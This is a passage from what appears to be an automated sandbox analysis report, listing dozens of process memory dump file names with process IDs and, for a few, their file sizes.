                                                                                                                                                                                                                                                                                                                                        • memory/3436-134-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/3468-114-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/3528-113-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/3536-127-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/3588-217-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/3700-89-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/3740-90-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/3764-65-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/3772-189-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/3772-137-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/3808-146-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/3808-125-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/3808-121-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/3852-140-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/3856-131-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/3876-129-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/3876-81-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/3892-64-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/3892-84-0x000001AAA4CB0000-0x000001AAA4CB1000-memory.dmp
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                        • memory/3892-75-0x00007FFDC0E90000-0x00007FFDC187C000-memory.dmp
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          9.9MB

                                                                                                                                                                                                                                                                                                                                        • memory/3892-95-0x000001AAA4E60000-0x000001AAA4E61000-memory.dmp
                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                                                                                                                                        • memory/3932-91-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4064-93-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4064-68-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4104-235-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4116-148-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4120-191-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4128-234-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4136-149-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4172-150-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4176-219-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4176-192-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4184-218-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4184-237-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4192-151-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4196-193-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4204-247-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4212-152-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4228-194-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4248-153-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4268-154-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4280-195-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4288-155-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4324-156-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4324-221-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4328-196-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4332-220-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4344-157-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4348-197-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4364-158-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4372-238-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4400-159-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4400-222-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4412-198-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4420-160-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4424-239-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4432-199-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4432-223-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4444-162-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4480-163-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4488-200-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4500-164-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4500-201-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4520-165-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4536-240-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4556-166-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4560-224-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4572-202-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4576-167-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4580-225-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4592-203-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4596-168-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4636-170-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4640-204-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4656-241-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4656-171-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4668-227-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4668-205-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4676-172-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4684-242-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4684-226-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4688-173-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4696-206-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4712-248-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4720-229-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4728-209-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4752-174-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4776-208-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4780-175-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4780-207-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4796-243-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4804-228-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4808-176-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4844-177-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4856-210-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4864-178-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4864-244-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4876-231-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4876-211-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4884-179-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4900-252-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4900-230-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4920-249-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4920-180-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4924-212-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4940-181-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4960-182-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4968-246-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4968-213-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4968-232-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/4996-183-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/5000-214-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/5000-250-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/5016-184-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/5024-236-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/5024-251-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/5036-185-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/5044-215-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/5052-245-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/5072-216-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/5072-186-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/5092-187-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/5108-233-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                        • memory/5112-188-0x0000000000000000-mapping.dmp